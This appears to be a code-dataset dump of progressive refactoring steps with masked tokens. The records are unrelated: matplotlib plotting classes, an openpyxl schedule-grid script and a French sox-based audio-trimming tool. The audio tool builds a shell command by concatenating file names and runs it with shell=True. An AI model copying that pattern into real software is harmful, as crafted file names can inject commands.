"step-5": "import matplotlib.pyplot as plt\r\n\r\n\r\nclass Scatter:\r\n def __init__(self, values, ylabel, title):\r\n self.values = values\r\n self.range = list(range(len(values)))\r\n self.ylabel = ylabel\r\n self.title = title\r\n\r\n def plot(self):\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n ax.scatter(self.range, self.values, color='r', s=1)\r\n ax.set_xlabel('Days')\r\n ax.set_ylabel(self.ylabel)\r\n ax.set_title(self.title)\r\n plt.ylim(0, self.values[-1])\r\n plt.show()\r\n\r\n\r\nclass Pie:\r\n def __init__(self, values, labels, title):\r\n self.style = \"fivethirtyeight\"\r\n self.values = values\r\n self.labels = labels\r\n self.explode = [0 for i in range(len(values))]\r\n self.title = title\r\n\r\n def plot(self):\r\n plt.style.use(self.style)\r\n\r\n plt.pie(self.values, labels=self.labels, explode=self.explode, shadow=True,\r\n startangle=90, autopct='%1.1f%%',\r\n wedgeprops={'edgecolor': 'black'})\r\n\r\n plt.title(self.title)\r\n plt.tight_layout()\r\n\r\n plt.show()\r\n\r\n\r\nclass Column:\r\n pass",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
#!/usr/bin/python
#
#
# This is the Hydra slave module
|
normal
|
{
"blob_id": "95cdf6a22655d500c2838899ec9dfbff637a5969",
"index": 2097,
"step-1": "#!/usr/bin/python\n#\n#\n\n# This is the Hydra slave module\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
import pandas as pd
import os
import openpyxl
from collections import defaultdict,deque
# Tunable parameters
filename = 'kaito7.xlsx' # input file name
Output = 'output7.xlsx' # output file name
wb = openpyxl.load_workbook(filename)
sheets = wb.sheetnames
days = []
names = []
dict = defaultdict(dict)
for sheet in sheets:
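    # Row 1 of each sheet holds the day labels; column 2 holds the names.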
sh = wb[sheet]
i = 3
while True:
tmp = sh.cell(row=1,column=i).value
if tmp:
days.append(tmp)
else:
break
i += 1
print(days)
days.pop()
i = 2
while True:
tmp = sh.cell(row=i,column=2).value
if tmp:
names.append(tmp)
else:
break
i += 1
W = len(days)
H = len(names)
for y in range(2,2+H):
for x in range(3,3+W):
tmp = sh.cell(row=y,column=x).value
dict[names[y-2]][days[x-3]] = tmp
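# Take the list of time slots from one cell that is known to list them all.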
times = dict['しまむら']['7/10(水)'].split(', ')
ans = [[' ', ' '] + names]
for d in days:
for t in times:
tmpl = [d,t]
for n in names:
if dict[n][d] and t in dict[n][d]:
tmpl.append(1)
else:
tmpl.append(0)
ans.append(tmpl)
for a in ans:
print(a)
wb = openpyxl.load_workbook(Output)
sheets = wb.sheetnames
sheet = wb[sheets[0]]
def write_list_2d(sheet, l_2d, start_row, start_col):
for y, row in enumerate(l_2d):
for x, cell in enumerate(row):
#print(l_2d[y][x])
sheet.cell(row=start_row + y,column=start_col + x,value=l_2d[y][x])
#print(sheet.cell(row=start_row + y,column=start_col + x).value)
write_list_2d(sheet,ans,1,1)
wb.save(Output)
print(sheets[0])
|
normal
|
{
"blob_id": "37d5696c402737bfafe21b20b90a49e2753fdc4f",
"index": 7287,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1, column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n i = 2\n while True:\n tmp = sh.cell(row=i, column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n W = len(days)\n H = len(names)\n for y in range(2, 2 + H):\n for x in range(3, 3 + W):\n tmp = sh.cell(row=y, column=x).value\n dict[names[y - 2]][days[x - 3]] = tmp\n<mask token>\nfor d in days:\n for t in times:\n tmpl = [d, t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\nfor a in ans:\n print(a)\n<mask token>\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n sheet.cell(row=start_row + y, column=start_col + x, value=l_2d[\n y][x])\n\n\nwrite_list_2d(sheet, ans, 1, 1)\nwb.save(Output)\nprint(sheets[0])\n",
"step-3": "<mask token>\nfilename = 'kaito7.xlsx'\nOutput = 'output7.xlsx'\nwb = openpyxl.load_workbook(filename)\nsheets = wb.sheetnames\ndays = []\nnames = []\ndict = defaultdict(dict)\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1, column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n i = 2\n while True:\n tmp = sh.cell(row=i, column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n W = len(days)\n H = len(names)\n for y in range(2, 2 + H):\n for x in range(3, 3 + W):\n tmp = sh.cell(row=y, column=x).value\n dict[names[y - 2]][days[x - 3]] = tmp\ntimes = dict['しまむら']['7/10(水)'].split(', ')\nans = [[' ', ' '] + names]\nfor d in days:\n for t in times:\n tmpl = [d, t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\nfor a in ans:\n print(a)\nwb = openpyxl.load_workbook(Output)\nsheets = wb.sheetnames\nsheet = wb[sheets[0]]\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n sheet.cell(row=start_row + y, column=start_col + x, value=l_2d[\n y][x])\n\n\nwrite_list_2d(sheet, ans, 1, 1)\nwb.save(Output)\nprint(sheets[0])\n",
"step-4": "import pandas as pd\nimport os\nimport openpyxl\nfrom collections import defaultdict, deque\nfilename = 'kaito7.xlsx'\nOutput = 'output7.xlsx'\nwb = openpyxl.load_workbook(filename)\nsheets = wb.sheetnames\ndays = []\nnames = []\ndict = defaultdict(dict)\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1, column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n i = 2\n while True:\n tmp = sh.cell(row=i, column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n W = len(days)\n H = len(names)\n for y in range(2, 2 + H):\n for x in range(3, 3 + W):\n tmp = sh.cell(row=y, column=x).value\n dict[names[y - 2]][days[x - 3]] = tmp\ntimes = dict['しまむら']['7/10(水)'].split(', ')\nans = [[' ', ' '] + names]\nfor d in days:\n for t in times:\n tmpl = [d, t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\nfor a in ans:\n print(a)\nwb = openpyxl.load_workbook(Output)\nsheets = wb.sheetnames\nsheet = wb[sheets[0]]\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n sheet.cell(row=start_row + y, column=start_col + x, value=l_2d[\n y][x])\n\n\nwrite_list_2d(sheet, ans, 1, 1)\nwb.save(Output)\nprint(sheets[0])\n",
"step-5": "import pandas as pd\nimport os\nimport openpyxl\nfrom collections import defaultdict,deque\n\n# 調節用パラメータ\nfilename = 'kaito7.xlsx' # 入力ファイル名\nOutput = 'output7.xlsx' # 出力ディレクトリ\n\n\nwb = openpyxl.load_workbook(filename)\nsheets = wb.sheetnames\n\ndays = []\nnames = []\ndict = defaultdict(dict)\nfor sheet in sheets:\n sh = wb[sheet]\n i = 3\n while True:\n tmp = sh.cell(row=1,column=i).value\n if tmp:\n days.append(tmp)\n else:\n break\n i += 1\n print(days)\n days.pop()\n\n i = 2\n while True:\n tmp = sh.cell(row=i,column=2).value\n if tmp:\n names.append(tmp)\n else:\n break\n i += 1\n\n W = len(days)\n H = len(names)\n for y in range(2,2+H):\n for x in range(3,3+W):\n tmp = sh.cell(row=y,column=x).value\n dict[names[y-2]][days[x-3]] = tmp\n\ntimes = dict['しまむら']['7/10(水)'].split(', ')\n\nans = [[' ', ' '] + names]\nfor d in days:\n for t in times:\n tmpl = [d,t]\n for n in names:\n if dict[n][d] and t in dict[n][d]:\n tmpl.append(1)\n else:\n tmpl.append(0)\n ans.append(tmpl)\n\nfor a in ans:\n print(a)\n\n\nwb = openpyxl.load_workbook(Output)\nsheets = wb.sheetnames\nsheet = wb[sheets[0]]\n\n\ndef write_list_2d(sheet, l_2d, start_row, start_col):\n for y, row in enumerate(l_2d):\n for x, cell in enumerate(row):\n #print(l_2d[y][x])\n sheet.cell(row=start_row + y,column=start_col + x,value=l_2d[y][x])\n #print(sheet.cell(row=start_row + y,column=start_col + x).value)\n\nwrite_list_2d(sheet,ans,1,1)\n\nwb.save(Output)\n\nprint(sheets[0])\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/env python3
# Script that trims a silence or a musical passage from the beginning or the
# end of an audio file (.wav), using the matching transcription file.
# Only the .wav audio extension is supported.
# Supported transcription formats:
# - .stm
# - .mlfmanu
# Usage: python cutAudioFile.py audio.wav transcriptFile.* audio_trimmed.wav
import sys
from os import path # To strip file extensions
from subprocess import check_output, CalledProcessError, STDOUT # To run sox
# To parse the command-line arguments
from argparse import ArgumentParser, RawTextHelpFormatter, ArgumentTypeError
import utils
# Finds the start and end of the cut in the transcription file.
# Returns the start and end times of the cut, in seconds.
# stm format.
def searchBeginAndEndStm(transFileName):
    fileName = path.splitext(path.basename(transFileName))[0] # stm name, without its extension
    # Open the file with the right encoding when one is specified
if (path.isfile(path.dirname(transFileName) + "/encoding.txt")):
e = open(path.dirname(transFileName) + "/encoding.txt", 'r')
encod = e.readline()
f = open(transFileName, 'r', encoding=encod)
e.close()
else:
f = open(transFileName, 'r')
    # Read forward until we reach a transcription line (one starting with the file name)
currentLine = f.readline()
while (currentLine.split()[0] != fileName):
currentLine = f.readline()
    # If the first line is silence/music, take its end timestamp as the start; otherwise take its start timestamp
if (currentLine.split()[2] == "inter_segment_gap"):
debut = float(currentLine.split()[4])
else:
debut = float(currentLine.split()[3])
    # Walk to the end of the file, keeping track of the last "proper" line
nextLine = f.readline()
while (nextLine != ''):
if (nextLine.split()[0] == fileName and nextLine.split()[2] != "inter_segment_gap"):
currentLine = nextLine
nextLine = f.readline()
    # Take the end time of the last sentence
fin = float(currentLine.split()[4])
f.close()
return (debut, fin)
# Finds the start and end of the cut in the transcription file.
# Returns the start and end times of the cut, in seconds.
# mlfmanu format.
def searchBeginAndEndMlfmanu(transFileName):
    fileName = path.splitext(path.basename(transFileName))[0] # file name, without its extension
f = open(transFileName, 'r')
currentLine = f.readline()
    # Read the file line by line until we reach a non-empty line
    # that is neither a comment nor a silence.
while (currentLine[0] == "#" or currentLine[0] == "\"" or currentLine.split()[2] == "sil"):
currentLine = f.readline()
    debut = float(currentLine.split()[0]) / 10000000 # convert to seconds
nextLine = f.readline()
    # Read line by line until we reach the last line (silence lines excluded)
while (nextLine[0] != '.'):
if (nextLine.split()[2] != "sil"):
currentLine = nextLine
nextLine = f.readline()
    fin = float(currentLine.split()[1]) / 10000000 # convert to seconds
f.close()
return (debut, fin)
# Cuts the audio file from cutBegin to cutEnd (in seconds).
def cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):
duration = cutEnd - cutBegin
try:
check_output("sox " + audioFileName + " " + cutFileName + " trim " + str(cutBegin) + " " + str(duration), shell = True, stderr=STDOUT)
except CalledProcessError as exc:
utils.eprintCalledProcessError(exc, "à SOX")
sys.exit(1)
def main(audioFileName, transFileName, outputFileName, beginningTime=None, endTime=None):
extension = path.splitext(transFileName)[1]
if (extension == ".stm"):
(debut, fin) = searchBeginAndEndStm(transFileName)
elif (extension == ".mlfmanu"):
(debut, fin) = searchBeginAndEndMlfmanu(transFileName)
    # Keep whichever start/end times are more restrictive
if (beginningTime is not None and beginningTime > debut):
debut = beginningTime
if (endTime is not None and endTime < fin):
fin = endTime
    cutAudioFile(audioFileName, outputFileName, debut, fin) # trim the audio file
def parseArgs():
parser = ArgumentParser(description="Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\n"
"Si les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.", formatter_class=RawTextHelpFormatter)
parser.add_argument("audioFileName", metavar="audioFile",
help="fichier audio (extension wav uniquement).",
type=utils.isValidFile)
parser.add_argument("transFileName", metavar="transcriptFile",
help="fichier de transcription (extensions stm et mlfmanu supportées).",
type=utils.isValidTranscriptFile)
parser.add_argument("outputFileName", metavar="outputFile",
help="nom du fichier de sortie (coupé).")
parser.add_argument("-b", "--beginning", dest="beginningTime", required=False,
help="le temps de début de la coupe.", metavar="beginningTime",
type=utils.isPositiveNumber)
parser.add_argument("-e", "--end", dest="endTime", required=False,
help="le temps de fin de la coupe.", metavar="endTime",
type=utils.isPositiveNumber)
args = parser.parse_args()
return (args.audioFileName, args.transFileName, args.outputFileName, args.beginningTime, args.endTime)
if __name__ == '__main__':
    args = parseArgs() # parse the arguments
    main(*args) # unpack the tuple and pass its elements to main
|
normal
|
{
"blob_id": "77531233219b76be51aed86536e4d92b8dc5ccad",
"index": 5494,
"step-1": "<mask token>\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\n<mask token>\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None,\n endTime=None):\n extension = path.splitext(transFileName)[1]\n if extension == '.stm':\n debut, fin = searchBeginAndEndStm(transFileName)\n elif extension == '.mlfmanu':\n debut, fin = searchBeginAndEndMlfmanu(transFileName)\n if beginningTime is not None and beginningTime > debut:\n debut = beginningTime\n if endTime is not None and endTime < fin:\n fin = endTime\n cutAudioFile(audioFileName, outputFileName, debut, fin)\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, 
args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None,\n endTime=None):\n extension = path.splitext(transFileName)[1]\n if extension == '.stm':\n debut, fin = searchBeginAndEndStm(transFileName)\n elif extension == '.mlfmanu':\n debut, fin = searchBeginAndEndMlfmanu(transFileName)\n if beginningTime is not None and beginningTime > debut:\n debut = beginningTime\n if endTime is not None and endTime < fin:\n fin = endTime\n cutAudioFile(audioFileName, outputFileName, debut, fin)\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, 
args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\nif __name__ == '__main__':\n args = parseArgs()\n main(*args)\n",
"step-4": "import sys\nfrom os import path\nfrom subprocess import check_output, CalledProcessError, STDOUT\nfrom argparse import ArgumentParser, RawTextHelpFormatter, ArgumentTypeError\nimport sys\nimport utils\n\n\ndef searchBeginAndEndStm(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n if path.isfile(path.dirname(transFileName) + '/encoding.txt'):\n e = open(path.dirname(transFileName) + '/encoding.txt', 'r')\n encod = e.readline()\n f = open(transFileName, 'r', encoding=encod)\n e.close()\n else:\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine.split()[0] != fileName:\n currentLine = f.readline()\n if currentLine.split()[2] == 'inter_segment_gap':\n debut = float(currentLine.split()[4])\n else:\n debut = float(currentLine.split()[3])\n nextLine = f.readline()\n while nextLine != '':\n if nextLine.split()[0] == fileName and nextLine.split()[2\n ] != 'inter_segment_gap':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[4])\n f.close()\n return debut, fin\n\n\ndef searchBeginAndEndMlfmanu(transFileName):\n fileName = path.splitext(path.basename(transFileName))[0]\n f = open(transFileName, 'r')\n currentLine = f.readline()\n while currentLine[0] == '#' or currentLine[0] == '\"' or currentLine.split(\n )[2] == 'sil':\n currentLine = f.readline()\n debut = float(currentLine.split()[0]) / 10000000\n nextLine = f.readline()\n while nextLine[0] != '.':\n if nextLine.split()[2] != 'sil':\n currentLine = nextLine\n nextLine = f.readline()\n fin = float(currentLine.split()[1]) / 10000000\n f.close()\n return debut, fin\n\n\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, cutEnd):\n duration = cutEnd - cutBegin\n try:\n check_output('sox ' + audioFileName + ' ' + cutFileName + ' trim ' +\n str(cutBegin) + ' ' + str(duration), shell=True, stderr=STDOUT)\n except CalledProcessError as exc:\n utils.eprintCalledProcessError(exc, 'à SOX')\n sys.exit(1)\n\n\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None,\n endTime=None):\n extension = path.splitext(transFileName)[1]\n if extension == '.stm':\n debut, fin = searchBeginAndEndStm(transFileName)\n elif extension == '.mlfmanu':\n debut, fin = searchBeginAndEndMlfmanu(transFileName)\n if beginningTime is not None and beginningTime > debut:\n debut = beginningTime\n if endTime is not None and endTime < fin:\n fin = endTime\n cutAudioFile(audioFileName, outputFileName, debut, fin)\n\n\ndef parseArgs():\n parser = ArgumentParser(description=\n \"\"\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\nSi les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\"\"\"\n , formatter_class=RawTextHelpFormatter)\n parser.add_argument('audioFileName', metavar='audioFile', help=\n 'fichier audio (extension wav uniquement).', type=utils.isValidFile)\n parser.add_argument('transFileName', metavar='transcriptFile', help=\n 'fichier de transcription (extensions stm et mlfmanu supportées).',\n type=utils.isValidTranscriptFile)\n parser.add_argument('outputFileName', metavar='outputFile', help=\n 'nom du fichier de sortie (coupé).')\n parser.add_argument('-b', '--beginning', dest='beginningTime', required\n =False, help='le temps de début de la coupe.', metavar=\n 'beginningTime', type=utils.isPositiveNumber)\n parser.add_argument('-e', '--end', 
dest='endTime', required=False, help\n ='le temps de fin de la coupe.', metavar='endTime', type=utils.\n isPositiveNumber)\n args = parser.parse_args()\n return (args.audioFileName, args.transFileName, args.outputFileName,\n args.beginningTime, args.endTime)\n\n\nif __name__ == '__main__':\n args = parseArgs()\n main(*args)\n",
"step-5": "#!/usr/bin/env python3\r\n\r\n# Script qui permet de couper au début ou à la fin d'un fichier audio (.wav)\r\n# un silence ou un passage musical à partir d'un fichier de transcription correspondant.\r\n# Supporte uniquement l'extension audio .wav.\r\n# Supporte les formats de transcriptions suivants :\r\n# - .stm\r\n# - .mlfmanu\r\n\r\n# Usage : python cutAudioFile.py audio.wav transcriptFile.* audio_trimmed.wav\r\nimport sys\r\nfrom os import path # Pour couper l'extension de fichier\r\nfrom subprocess import check_output, CalledProcessError, STDOUT # Pour lancer sox\r\n# Pour parser les arguments\r\nfrom argparse import ArgumentParser, RawTextHelpFormatter, ArgumentTypeError\r\nimport sys\r\nimport utils\r\n\r\n# Cherche le début et la fin de la coupe dans le fichier de transcription.\r\n# Retourne les temps de début et de fin de la coupe en secondes.\r\n# Format stm.\r\ndef searchBeginAndEndStm(transFileName):\r\n fileName = path.splitext(path.basename(transFileName))[0] # Nom du stm sans extension\r\n\r\n # On ouvre le fichier avec le bon encodage si celui-ci est précisé\r\n if (path.isfile(path.dirname(transFileName) + \"/encoding.txt\")):\r\n e = open(path.dirname(transFileName) + \"/encoding.txt\", 'r')\r\n encod = e.readline()\r\n f = open(transFileName, 'r', encoding=encod)\r\n e.close()\r\n else:\r\n f = open(transFileName, 'r')\r\n\r\n #Tant qu'on a pas une ligne de transcription (commencant par le nom de fichier) on lit en avancant\r\n currentLine = f.readline()\r\n while (currentLine.split()[0] != fileName):\r\n currentLine = f.readline()\r\n\r\n #Si la première ligne est un silence/musique, on prend comme début le timestamp de fin, sinon le timestamp de début\r\n if (currentLine.split()[2] == \"inter_segment_gap\"):\r\n debut = float(currentLine.split()[4])\r\n else:\r\n debut = float(currentLine.split()[3])\r\n \r\n #On va jusqu'à la fin du fichier en conservant la dernière ligne \"correcte\"\r\n nextLine = f.readline()\r\n while (nextLine != ''):\r\n if (nextLine.split()[0] == fileName and nextLine.split()[2] != \"inter_segment_gap\"):\r\n currentLine = nextLine\r\n nextLine = f.readline()\r\n\r\n #On prend la fin de la dernière phrase\r\n fin = float(currentLine.split()[4]) \r\n \r\n f.close()\r\n\r\n return (debut, fin)\r\n\r\n# Cherche le début et la fin de la coupe dans le fichier de transcription.\r\n# Retourne les temps de début et de fin de la coupe en secondes.\r\n# Format mlfmanu.\r\ndef searchBeginAndEndMlfmanu(transFileName):\r\n fileName = path.splitext(path.basename(transFileName))[0] #Nom du fichier sans extension\r\n \r\n f = open(transFileName, 'r')\r\n currentLine = f.readline()\r\n # On lit le fichier ligne par ligne tant qu'on a pas atteint une ligne non vide,\r\n # qui n'est pas un commentaire ou qui n'est pas un silence.\r\n while (currentLine[0] == \"#\" or currentLine[0] == \"\\\"\" or currentLine.split()[2] == \"sil\"):\r\n currentLine = f.readline()\r\n\r\n debut = float(currentLine.split()[0]) / 10000000; #Conversion en secondes\r\n\r\n nextLine = f.readline()\r\n # On lit ligne par ligne tant qu'on a pas atteint la dernière ligne (ligne de silence exclus)\r\n while (nextLine[0] != '.'):\r\n if (nextLine.split()[2] != \"sil\"):\r\n currentLine = nextLine\r\n nextLine = f.readline()\r\n \r\n fin = float(currentLine.split()[1]) / 10000000; #Conversion en secondes\r\n \r\n f.close()\r\n \r\n return (debut, fin)\r\n\r\n# Coupe le fichier audio de cutBegin jusqu'à cutEnd (en secondes).\r\ndef cutAudioFile(audioFileName, cutFileName, cutBegin, 
